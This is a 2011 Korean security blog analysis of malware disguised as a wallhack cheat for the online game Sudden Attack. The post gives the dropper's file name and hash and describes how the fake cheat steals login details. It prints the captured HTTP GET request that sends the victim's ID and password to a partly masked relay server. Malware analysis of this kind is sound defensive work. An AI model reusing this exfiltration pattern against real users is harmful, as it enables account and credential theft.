본문 바로가기

벌새::Analysis

넷마블 서든어택 계정 수집 악성코드 유포 주의 (2011.5.26)

반응형
최근 특정 네이버(Naver) 블로그를 이용하여 온라인 게임핵으로 추정되는 고니월핵으로 위장한 파일을 이용하여 넷마블에서 서비스하는 온라인 게임 서든어택(Sudden Attack)의 계정 정보를 수집하는 악성 파일을 확인하였습니다.

 

 

해당 핵 프로그램은 압축 파일 내부에 포함된 x1njet.exe.exe (MD5 : b71bf6bf2073e1459153af91a89ae37e) 파일을 실행하도록 구성되어 있습니다.

 

x1njet.exe.exe

 

참고로 x1njet.exe.exe 파일에 대하여 Avira AntiVir 보안 제품에서는 TR/Dropper.Gen (1/43) 진단명으로 진단되고 있기에 대부분의 사용자는 의심없이 파일을 이용할 가능성이 높습니다.

 

 

파일을 실행하면 그림과 같이 서든어택 로그인 입력 부분과 월핵 적용과 해제 부분으로 구성되어 있습니다.

사용자가 핵 프로그램을 사용하기 위해 서든어택 ID와 비밀번호를 입력할 경우 다음과 같은 네이버 특정 계정 이메일로 정보가 유출되는 것을 확인하였습니다.

 

 

GET /ma.php?from=(서든어택 사용자 ID)&to=(정보 수집 네이버 ID : ccc_**@naver.com)&title=(서든어택 사용자 비밀번호)&body=%B3%BB%BF%EB+%BE%F8%C0%BD HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: rudals**.nayana.com
Connection: Keep-Alive

전송 방식은 nayana 호스팅 계정에 등록된 서버를 경유하여 최종적으로 해당 핵 프로그램을 유포하고 있는 네이버 계정 사용자 이메일로 서든어택 계정 정보가 전송되고 있습니다.

그러므로 온라인 게임 핵과 관련된 프로그램 중에는 계정 정보와 같은 민감한 개인정보 탈취를 통해 금전적 손실을 유발하는 경우가 많으므로 사용하지 않도록 주의하시기 바랍니다.

 

728x90
반응형